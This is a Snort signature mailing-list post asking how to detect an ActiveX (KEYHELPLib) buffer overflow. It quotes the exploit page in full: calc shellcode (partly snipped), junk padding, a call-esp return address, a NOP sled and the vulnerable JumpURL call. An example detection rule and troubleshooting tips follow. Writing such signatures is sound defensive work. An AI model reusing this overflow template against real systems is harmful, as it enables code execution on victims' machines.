[Snort-sigs] Problem writing a sig to capture vbscript unescape sequence

Bob Huber roberthuberjr at ...144...
Fri May 18 13:52:08 EDT 2012


I'm trying to write a sig for this ActiveX overflow:

<html>
<body>
<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' />
</object>
<script language='vbscript'>
//executing calc
scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
             ...SNIP...
             unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
jnk = string(537,"A")
eip = unescape("%67%41%41%7e") '0x7E414167      call esp user32.dll
nop = string(16,unescape("%90"))
mapID=1
pstrChmFile= jnk + eip + nop + scode
pstrFrame="aaaaaaaa"
'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
</script>
</body>
</html>

The problem I'm having is trying to get a content match off of the line:

    eip = unescape("%67%41%41%7e")

I can't figure out how to match that content. I'm running both 2.8.5 and 2.9.2. I was assuming it would see the <script> tag and it would try to decode javascript, and maybe that was the problem. I've tried file_data, I've tried pkt_data. I've turned off javascript normalization, I've turned off extended_response_inspection. No luck.

Any help appreciated.

Bob
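For reference, here is one way to express that match as a Snort 2.9 rule; this is an added example, not a rule from the original post or from the Snort rule sets, and the msg text, the local sid and the choice to anchor on the CLSID from the PoC are my assumptions.

```snort
# Added example, not from the original post. Looks for the KEYHELPLib CLSID
# from the PoC followed by the literal unescape("%67%41%41%7e") string in an
# HTTP response body (file_data reassembles the body for the content checks).
# "%" is not special in a content string, but the double quotes must be given
# as hex (|22|) because a raw " would terminate the content argument.
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
    msg:"KEYHELPLib JumpURL overflow attempt - eip unescape sequence"; \
    flow:to_client,established; \
    file_data; \
    content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; nocase; \
    content:"unescape(|22|%67%41%41%7e|22|)"; nocase; distance:0; \
    classtype:attempted-user; \
    sid:1000001; rev:1; \
)
```

If this still does not fire against the PoC page, drop the file_data keyword and the first content match temporarily so the rule inspects the raw payload; if it fires then, the problem is in HTTP response reassembly or normalization (gzip, chunking) rather than in the content string itself.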